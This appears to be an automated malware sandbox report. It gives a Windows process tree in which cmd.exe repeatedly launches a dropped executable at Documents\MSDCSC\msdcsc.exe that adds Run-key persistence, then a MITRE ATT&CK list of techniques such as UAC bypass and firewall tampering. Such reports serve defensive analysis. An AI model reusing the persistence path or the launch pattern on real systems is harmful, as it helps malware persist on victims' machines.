- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4712,i,18059671437679821604,8219690972983204913,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5040 /prefetch:14
  2⤵
  PID:6520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5248,i,18059671437679821604,8219690972983204913,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5280 /prefetch:1
  2⤵
  PID:6856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:5372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeb6efdcf8,0x7ffeb6efdd04,0x7ffeb6efdd10
  2⤵
  PID:1132

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:2340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeb6efdcf8,0x7ffeb6efdd04,0x7ffeb6efdd10
  2⤵
  PID:3036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:3164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffeb6efdcf8,0x7ffeb6efdd04,0x7ffeb6efdd10
  2⤵
  PID:4612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:5752
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:3684

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
1⤵
PID:3684

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:6768
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:7084
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:6356
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4708

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2380
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:6544
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1968 -prefsLen 27097 -prefMapHandle 1972 -prefMapSize 270279 -ipcHandle 2060 -initialChannelId {2f0b9a0c-70c9-4bf4-b9bb-5b2f7df135f4} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
    3⤵
    PID:2564
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2412 -prefsLen 27133 -prefMapHandle 2416 -prefMapSize 270279 -ipcHandle 2432 -initialChannelId {e87effb8-6f37-43a5-a7ab-9df5670ee3a8} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
    3⤵
    - Checks processor information in registry
    PID:832
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3764 -prefsLen 27274 -prefMapHandle 3768 -prefMapSize 270279 -jsInitHandle 3772 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3780 -initialChannelId {885b880f-d199-4e92-a064-874565d3663c} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
    3⤵
    - Checks processor information in registry
    PID:6760
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3764 -prefsLen 27274 -prefMapHandle 3820 -prefMapSize 270279 -ipcHandle 3968 -initialChannelId {c50c25cc-97cd-4ea2-9ed8-7186c4b174d8} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
    3⤵
    PID:6976
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2748 -prefsLen 34773 -prefMapHandle 2916 -prefMapSize 270279 -jsInitHandle 2684 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3216 -initialChannelId {48d8d943-bba5-46c3-8590-e4fe81459862} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
    3⤵
    - Checks processor information in registry
    PID:704
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4944 -prefsLen 35010 -prefMapHandle 4948 -prefMapSize 270279 -ipcHandle 4956 -initialChannelId {3e2d171f-9b06-4ab5-a8c5-95c80eeec73d} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
    3⤵
    - Checks processor information in registry
    PID:5328
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5512 -prefsLen 33031 -prefMapHandle 5144 -prefMapSize 270279 -jsInitHandle 5148 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5140 -initialChannelId {513d5e97-1b89-42ea-ae7f-f5fafe499443} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
    3⤵
    - Checks processor information in registry
    PID:1756
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5508 -prefsLen 33031 -prefMapHandle 5524 -prefMapSize 270279 -jsInitHandle 5732 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4640 -initialChannelId {ad7750d2-7bea-49f0-8630-2b56058d0ea6} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
    3⤵
    - Checks processor information in registry
    PID:6960
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5928 -prefsLen 33031 -prefMapHandle 5932 -prefMapSize 270279 -jsInitHandle 5936 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5160 -initialChannelId {1e1f9268-fe20-4c9d-93d6-9d62ce909e00} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
    3⤵
    - Checks processor information in registry
    PID:5876
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6388 -prefsLen 33071 -prefMapHandle 6384 -prefMapSize 270279 -jsInitHandle 6380 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6404 -initialChannelId {96cfffb2-960d-419e-bd2c-008ea0a47bcd} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab
    3⤵
    - Checks processor information in registry
    PID:2420

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:5876
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  PID:6948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:6732
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:8
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:3792

C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\wt.exe
"C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Microsoft.WindowsTerminal_8wekyb3d8bbwe\wt.exe" -d "C:\Users\Admin\Desktop\."
1⤵
PID:1032
- C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe
  wt.exe -d "C:\Users\Admin\Desktop\."
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:4316
- - C:\Windows\system32\wsl.exe
    C:\Windows\system32\wsl.exe --list
    3⤵
    PID:1740
- - C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\OpenConsole.exe
    "C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\OpenConsole.exe" --headless --win32input --resizeQuirk --width 120 --height 27 --signal 0xa40 --server 0xa3c
    3⤵
    PID:5248
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe
    3⤵
    PID:5216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:6156
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:6788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:5700
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:6836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:3008
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:6096
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:3352
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:5444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:7012
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6308

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:6900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeb6efdcf8,0x7ffeb6efdd04,0x7ffeb6efdd10
  2⤵
  PID:7136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2004,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2104 /prefetch:11
  2⤵
  PID:6176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1928,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=1916 /prefetch:2
  2⤵
  PID:5188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2344,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2320 /prefetch:13
  2⤵
  PID:5324
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3216,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3372 /prefetch:1
  2⤵
  PID:1408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3340,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3452 /prefetch:1
  2⤵
  PID:5656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4488,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4540 /prefetch:1
  2⤵
  PID:6784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5144,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5160 /prefetch:14
  2⤵
  PID:2640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5240,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5256 /prefetch:14
  2⤵
  PID:6264
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4308,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5340 /prefetch:1
  2⤵
  PID:5680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=212,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3372 /prefetch:14
  2⤵
  PID:3012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5440,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3552 /prefetch:14
  2⤵
  PID:3700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5160,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3464 /prefetch:14
  2⤵
  PID:6608

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:3320

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:6020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:7064
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:5732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:6612
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:5068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
1⤵
PID:1392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
  2⤵
  PID:3300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:2380
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:5832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:2112
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:1872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:2844
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:3892
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:3316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:2212
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:6080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:3576
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  PID:6768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:1380
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:1076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:4424
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:6632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:5012
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:3896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:4720
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:2848
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:6116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:6832
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  PID:4768

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38f9855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4708

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

BITS Jobs

T1197

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery